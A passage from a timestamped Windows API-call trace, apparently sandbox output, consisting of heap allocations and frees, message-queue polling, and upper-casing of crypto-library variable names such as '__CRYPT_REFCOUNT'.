hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0153.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0153.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0153.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0153.135] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0153.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0153.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0153.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0153.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0153.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0153.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0153.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0153.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0153.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0153.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0153.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0153.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0153.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0153.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0153.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0153.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0153.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0153.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0153.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0153.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0153.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0153.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0153.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0153.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0153.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0153.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0153.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0153.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0153.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0153.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0153.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0153.136] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0153.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0153.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0153.136] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0153.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0153.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0153.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0153.137] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0153.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0153.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0153.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0153.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0153.137] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0153.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0153.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0153.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0153.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0153.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0153.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0153.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0153.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0153.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0153.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0153.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0153.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0153.137] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0153.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0153.137] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0153.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0153.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0153.138] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0153.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0153.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0153.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0153.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0153.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0153.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0153.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0153.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0153.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0153.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0153.219] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0153.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0153.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0153.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0153.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0153.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0153.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0153.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0153.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0153.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0153.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0153.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0153.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0153.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0153.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0153.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0153.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0153.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0153.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0153.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0153.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0153.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0153.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0153.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0153.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0153.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0153.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0153.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0153.225] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0153.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0153.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0153.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0153.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0153.225] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0153.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0153.225] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0153.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0153.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0153.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0153.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0153.225] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0153.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0153.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0153.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0153.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0153.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0153.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0153.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0153.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0153.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0153.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0153.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0153.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0153.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0153.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0153.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0153.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0153.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0153.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0153.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0153.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0153.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0153.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0153.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0153.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0153.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0153.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0153.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0153.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0153.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0153.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0153.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0153.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0153.242] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0153.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0153.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0153.242] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0153.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0153.242] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0153.242] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0153.242] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0153.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0153.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0153.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0153.243] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0153.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0153.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0153.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0153.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0153.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0153.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0153.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0153.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0153.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0153.243] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0153.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0153.243] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0153.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0153.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0153.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0153.243] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0153.243] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0153.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0153.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0153.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0153.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0153.244] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0153.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0153.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0153.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0153.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0153.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0153.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0153.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0153.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0153.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0153.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0153.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0153.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0153.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0153.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0153.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0153.244] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0153.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0153.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0153.245] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0153.245] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0153.245] RtlAllocateHeap (HeapHandle=0x970000, 